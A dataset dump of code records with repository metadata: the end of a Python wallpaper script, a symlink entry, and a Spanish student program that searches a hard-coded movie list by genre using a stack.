os.system("mv "+imageName+" ~/Desktop/RedditWallpaper/"+imageName)
counter += 1
curTime = datetime.datetime.now()
curTime = curTime.strftime(timeStructure)
f = open(scheduleFile, 'w')
f.write(curTime)
os.system("rm ./output.txt")
if __name__ == "__main__":
main()
|
[
"[email protected]"
] | |
7a05ffedb2db5040001c4d20b87e94c649ca34d8
|
fa7aa574c89c282629af5a95825d88051d58eaf0
|
/py/symlinksToFiles/Link to crawler - Copy (190).py
|
80c748b849a2ed082c295ae56c8e58ca86b54fd5
|
[] |
no_license
|
ankurspadale/sampleForTest
|
52629f9039524a77a1b853894976f223331ede62
|
ca28d41e1288c7f04670133cf5c113b8dcbe0f97
|
refs/heads/master
| 2021-05-06T05:34:55.844687 | 2019-04-30T10:49:55 | 2019-04-30T10:49:55 | 115,111,347 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 56 |
py
|
/home/ankur/git/sampleForTest/py/crawler - Copy (190).py
|
[
"[email protected]"
] | |
bfe1228380b508c2747a3f62b20939b0d229ad81
|
786a3dbff1c0e211cb0fd724c8e2f7dcda205e2c
|
/Peliculas.py
|
803f6b353cf422a268dc7919d26b879618369f10
|
[] |
no_license
|
NicoRiveraR/CienciasIII
|
5d7b84b38db12443ada4cd5f5cce1c8385ad110e
|
d94ab95b557e8c8d05081b8590d848282a3dd9de
|
refs/heads/master
| 2021-01-16T19:49:14.846102 | 2017-08-22T22:41:44 | 2017-08-22T22:41:44 | 100,187,682 | 0 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,694 |
py
|
from pila import*
pPeliculas = Pila()
pBusquedas = Pila()
class Peliculas:
def __init__(self, nombre, ano, actor, genero):
self.nombre = nombre
self.ano = ano
self.actor = actor
self.genero = genero
def getGenero(self):
return self.genero
def getNombre(self):
return self.nombre
def getAno(self):
return self.ano
def getActor(self):
return self.actor
class BusquedaPeliculas:
def initPeliculas(self):
global pPeliculas
p0 = Peliculas("Love exposure", "2008", "Takahiro Nishijima", "Comedia")
p1 = Peliculas("Spiderman HomeComing", "2017", "Tom Holland", "Accion")
p2 = Peliculas("WonderWoman", "2017", "Gal Gadot", "Accion")
p3 = Peliculas("Gifted", "2017", "Chris Evans", "Drama")
p4 = Peliculas("El Conjuro", "2013", "Vera Farmiga", "Terror")
p5 = Peliculas("Ghost In The Shell", "2017", "Scarlett Johansson", "Accion")
p6 = Peliculas("Doctor Strange", "2016", "Benedict Cumberbath", "Accion")
p7 = Peliculas("Die Hard", "1989", "Bruce Willis", "Accion")
p8 = Peliculas("La Pelota de Letras", "2004", "Andres Lopez", "Comedia")
p9 = Peliculas("Ring", "1998", "Nanako Matsushima", "Terror")
allP = [p0,p1,p2,p3,p4,p5,p6,p7,p8,p9]
for x in range(0, 10):
pPeliculas.apilar(allP[x])
def busquedas(self):
global pBusquedas
pEncontradas = 0
print("Buscador de Peliculas con Pilas."+"\n")
print("Ingrese el Genero:")
genero = input() #Python 2.x raw_input(), 3.x input()
while (pPeliculas.es_vacia() == False):
aux = pPeliculas.desapilar()
if aux.getGenero() == genero:
pBusquedas.apilar(aux)
pEncontradas+=1
while (pBusquedas.es_vacia() == False):
pelicula = pBusquedas.desapilar()
print ("=========================================")
print ("Nombre: " + pelicula.getNombre() +"\n")
print ("Ano: " + pelicula.getAno() +"\n")
print ("Actor: " + pelicula.getActor() +"\n")
if(pEncontradas == 0):
print("No se encuentran peliculas de este genero." +"\n")
print("Desea realizar otra busqueda y/n")
ans = input()
if ans == "y":
self.initPeliculas()
self.busquedas()
else:
exit
class Main:
obj = BusquedaPeliculas()
obj.initPeliculas()
obj.busquedas()
|
[
"[email protected]"
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.